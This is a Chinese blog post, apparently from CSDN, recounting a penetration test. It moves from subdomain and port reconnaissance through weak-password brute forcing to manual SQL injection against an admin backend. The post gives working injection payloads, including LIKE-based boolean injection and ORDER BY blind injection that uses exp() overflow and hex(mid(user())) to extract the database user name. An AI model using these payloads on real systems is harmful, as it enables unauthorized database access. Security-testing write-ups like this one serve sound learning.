记一次渗透测试信息收集(子域名+端口)

网络渗透测试:信息收集与SQL注入实战
原创 已于 2024-04-18 17:02:24 修改 · 1.7k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #前端 #sql

于 2023-12-26 14:58:16 首次发布
部署运行你感兴趣的模型镜像

目录

一、当主站没啥业务功能时

二、信息收集之子域名挖掘

三、信息收集之端口扫描

四、弱口令

五、后台SQL注入

六、SQL注入之排序注入

七、SQL注入之排序注入2

八、SQL注入之排序注入—补充

        碰到个有意思的,记录一下

一、当主站没啥业务功能时

    www.kxxxxxxxxxxxxxxoo.com

似乎没有啥业务功能点,开始寻找该单位的其他的资产(站点)

二、信息收集之子域名挖掘

针对“域名”作信息收集

这里没有借助其他工具,只是单纯的在fofa里直接搜索主域名

发现存在 子域名 service.kexxxxx.com

下方箭头指示的ip,大概率是真实ip

点击访问此子域名,发现页面用户名及密码字段已自动填充

打开f12,定位到密码处,将type=password 的值改成任意 type=xxx 字段

就可以得到明文密码了

奇怪的是,这里点击登录一直在转圈圈,页面无任何反应...

如同是一个假的登录框,无利用价值......

开始思考其他可测试方式

…….

三、信息收集之端口扫描

上文提到“真实ip”的概念,此个过程为专门针对于“ip”作信息收集

第一种方式:在fofa中点击此处

会返回fofa中此“ip”历史开放端口的记录(缺点:不够全面,没有最新开放端口)

第二种方式:使用端口扫描器对此“ip”进行开放端口测试,如nmap等

这里我没有使用全端口扫描

接下里就是一个端口一个端口的访问

......

四、弱口令

8087端口上开放了一个应用系统后台

盲猜弱口令 admin/123456 admin/admin 无果(无test用户),就想着爆破,然后看了下登录的请求包,发现是302跳转(不管密码是否正确,都是302跳转)

此时,两种方式

  1. 继续盲猜弱口令,尝试更多常见口令

  1. 啥也不管,直接爆破

为何密码与否会有字节差异呢

来观察一下,

Location : 该属性表示该网页的跳转网址,也被称为重定向网址。

Ps:以后碰到302跳转的登录请求,可以尝试直接爆破。

五、后台SQL注入

        用户管理处,点击搜索

        一个单引号

        两个单引号

        三个单引号

        四个单引号

        ...

        确定存在SQL注入

        开始手工注入(也可以用sqlmap)

        Poc: 'and+'a'+like+'a

        //搜索处的SQL查询语句大多为  '' like '%%'

跑用户名:c......

        Poc:1'or+user()+like+'c%

六、SQL注入之排序注入

        关键参数值 desc

检测方法:

,1  &&  ,0

,1/1  &&  ,1/0

,exp(71) && ,exp(710)

异或

        这里使用的是exp() //数值大于709就会溢出

        Poc:AdminID+desc,exp(7)

        Poc:AdminID+desc,exp(710)

        此时不难发现,溢出时,响应时间比较长

        所以在盲注中,建议条件为真时溢出

        Poc 开始变形

        Poc:AdminID+desc,if(user()+like+'r%',exp(710),exp(7))

        Poc:AdminID+desc,if(user()+like+'c%',exp(710),exp(7))

七、SQL注入之排序注入2

        同ip的8080端口,注册一个账号进行登录

        点击产品管理

        此时的请求包

        Orderby参数处添加单引号无任何区别

其他的测试思路:

        orderby 顾名思义 是对字段进行排序,我是否可以赋给它一个很大的值,看是否会有异常(当排序的字段数超过查询语句中的字段数,会产生异常信息

        页面出现异常信息,说明orderby 参数的值是代入到数据库进行查询的

       使用反引号

        使用排序注入常规的测试方式

        构造poc,注出用户名

        值得一说的是,这里用不了substr  也用不了 单引号 及 ascii函数

        //substr

        //单引号

        //ascii

        这里使用 mid  hex

        Poc:

        1,case+when+hex(mid(user(),1,1))=63+then+exp(789)+else+exp(0)+end

        得到用户名的第一位为 c

        ......

八、SQL注入之排序注入—补充

        碰到个有意思的,记录一下

        1、因果的因:

        最近碰到挺多排序注入(关键字:orderby,desc,asc等)构造的poc大多为

        1,if(1,exp(789),1)

        1,case+when+hex(mid(user(),1,1))=63+then+exp(789)+else+exp(0)+end  

        ……

        (poc的书写取决于站点是否对相关函数、单引号有所拦截)

        总之都是利用盲注的方式来获取数据,从基础的poc fuzz到poc2、poc3甚至poc4,取决于waf的强弱、个人习惯。

        2、因果的果:

        图一是使用报错注入获取用户名

        图二是验证此poc是否可用(图一图二是同一系统不同的注入点)

        图三是在有waf的情况下使用(有没有觉得这个poc有点眼熟呀)

        拿着这个poc去尝试这些天碰到的排序注入,发现都可以嗷,对比盲注来说,漏洞证明的过程还是会节省一些时间。暂不知是否通用,还需要大量的案例来验证。

        由于时间关系,只验证了排序注入,也未在本地尝试。

        ……

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

信息收集子域名
妖魔鬼怪快离开的博客
03-17 3099
文章目录(一)子域名收集1.1 Google语法1.2 网络搜索引擎探测1.3 IP反查1.4 DNS流量1.5 爆破 (一)子域名收集 子域名:域名按照层级可以分为顶级域、主域名、子域名等 。例如.com是顶级域,主域名baicu.com,子域名则是在主域名的前面添加自定义名称,例如像map.baicu.com、music.baicu.com 这一类都可统称为子域名。 开头带的www又是什么呢?其实从整体上来说,这是一个URL地址,不是域名,www.baicu.com这种形式的域名并不是三级域名,
33.网络安全渗透测试—[信息收集篇2]—[子域名收集]
qwsn
08-05 2672
一个完整的域名由二个或二个以上部分组成,各部分之间用英文的句号"."来分隔,最后一个"."的右边部分称为顶级域名(TLD,也称为一级域名),最后一个"."的左边部分称为二级域名(SLD),二级域名的左边部分称为三级域名,以此类推,每一级的域名控制它下一级域名的分配。
信息收集子域名收集
MZLI_L的博客
08-19 1648
子域名收集 被动收集 被动收集: 被动收集指在不和目标产生交互的情况收集目标信息 常用方式 第三方平台收集,如百度、Google、fofa、Zoomeye之类的搜索引擎或者网络空间安全引擎。 第三方接口,如 站长工具、netcraft(主要查询国外域名)、dnsdb 由于是通过第三方平台获取信息,所以不会和目标产生任何的交互,所以隐蔽性很高 但是同时,其也存在信息时效性的问题。 示例 利用百度收集子域名 著名的Google hacker语法其实在诸多浏览器中也适用,通过构建精巧的语法语句,获取我们想要的
信息收集子域名收集
m0_46344990的博客
05-11 1484
一、子域名介绍 域名是个相对的概念,是相对父域名来说的。域名有很多级,中间用点分开。例如公司的顶级域名是以"com"结尾的,所有以 com 结尾的域名便都是它的子域。例如:voice.baidu.com便是"baidu.com"的子域,而 "baidu.com"是"com"的子域。 1.在渗透测试收集子域名可以发现更多的资产,如果渗透的目标面大了也增大了会有漏洞了概率 2.探测到更多隐藏或遗忘的应用服务,可能这些应用服务有严重漏洞 二、子域名收集方法 1.谷歌黑暗语法 可以直接通过浏览器来搜.
子域名收集
Yy10205473的博客
02-01 645
子域名收集介绍whois查询浏览器搜索引擎查询Layer子域名挖掘机FOFA (domain语法查询)工具探测 介绍 子域名爆破往往是渗透测试的第一步,是收集 IP 信息、脆弱点的前置条件。子域名爆破实际就是对每个子域名进行 DNS 查询,若存在相应解析录则证明该子域名存在。 whois查询 whois(读作“Who is”,非缩写)是用来查询域名的IP以及所有者等信息的传输协议。简单说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。通过whoi
渗透测试信息收集之域名信息子域名信息、IP信息端口信息
yjwangan的博客
11-24 3103
域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)DNS(域名系统,Domain Name System)是互联网的一项服务它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网顶尖域名二级域名三级域名.combaidu.com政府域名商业域名教育域名.gov.com.edu子域名指二级域名,二级域名是顶级域名(一级域名)的下一级。
SearchMap是一款集域名解析、IP反查域名、WHOIS查询、CDN检测、端口扫描、目录扫描、子域名挖掘为一体的前渗透测试综合信息收集工具 .zip
11-29
搜索地图_V1.0.2searchmap是一款集域名解析、IP反查域名、WHOIS查询、CDN检测、端口扫描、目录扫描、子域名挖掘为一体的前渗透测试综合信息收集工具。 一.安装说明1.工具使用python3开发,请确保您的电脑上已经安装...
渗透测试信息收集篇-服务器子域名收集
键盘的起始页
01-13 3008
你可能对某个服务器渗透失败,没有发现入侵点,所以我们可以考虑扩大攻击面,对是XXX.com的子域名 进行渗透,然后横向移动。
网络安全渗透测试中的信息收集方法与实践
最新发布
12-05
子域名收集有助于发现目标网络的更多潜在入口点,是渗透测试过程中的重要环节。 3. 站点信息收集:涉及网站架构和设计的信息,这些信息有助于渗透测试人员理解目标网站的技术栈,从而发现可能存在的技术漏洞。 4. ...
精选资源
计算机病毒与防护:渗透测试信息收集.ppt
06-10
【计算机病毒与防护:渗透测试信息收集渗透测试是一种模拟黑客攻击行为,以评估和增强网络安全性的过程。在这个过程中,信息收集是至关重要的第一步,它涉及到对目标系统的全面了解,以便找出潜在的弱点和切入...
子域名收集——Layer子域名挖掘机
12-26
强大的子域名收集工具,只要你有足够强大的字典,没有你扫不到的子域名,免费拿走
信息收集-子域名
weixin_49349476的博客
05-19 1401
企业可能有多个、几十个甚至更多的子域名应用,因为子域名数量多,企业子域名应用的防护可能会没有主站及时。攻击者在主站域名找不到突破口时,就可以进行子域名信息收集,然后通过子域名的漏洞进行迂回攻击。“Layer子域名挖掘机”是图形化的工具,内置了很多常见的子域名字典,支持多线程,可以识别域名的真实IP,是子域名枚举常用的工具之一。子域名是父域名的下一级,比如“huiyuan.xxx.com”和“bbs.xxx.com”这两个域名是“xxx.com”的子域名,可以通过枚举的方式对子域名进行收集(暴力破解)
子域名信息收集
voyage_1969的博客
03-11 310
子域名信息收集 1、 利用搜索引擎site功能 在搜索引擎中加入site:然后加上要收集的域名进行搜索(百度、必应、google、yahoo等) PS:关于这一方法,在搜索时发现了集成这一方法的工具Sublist3r,是一个python脚本,它会列举出多种资源如Google、Yahoo、Bing、Baidu和Ask等搜索引擎中可查找到的子域名,它还会列举出Netcraft、Virustotal、T...
信息收集.子域名
newlife1441的博客
07-24 845
子域名,是顶级域名(一级域名或父域名)的下一级,域名整体包括两个“.”或包括一个“.”和一个“/”顶级域名(一级域名或父域名)是".com"、".net"、".org"、".cn"等等,参考子域名_百度百科,那么我们为什么要收集子域名?提高发现漏洞的几率,举个例子,好比当初打gui子,你想一想是打gui子的大本营成功几率大还是去先打gui子的哨所,关卡成功几率大,毋庸置疑肯定是先打防护低的呗;...
04、收集子域名信息
qq_42053222的博客
04-14 1832
::danger子域名也就是二级域名, 是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的, 因为对于这种规模的目标, 一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值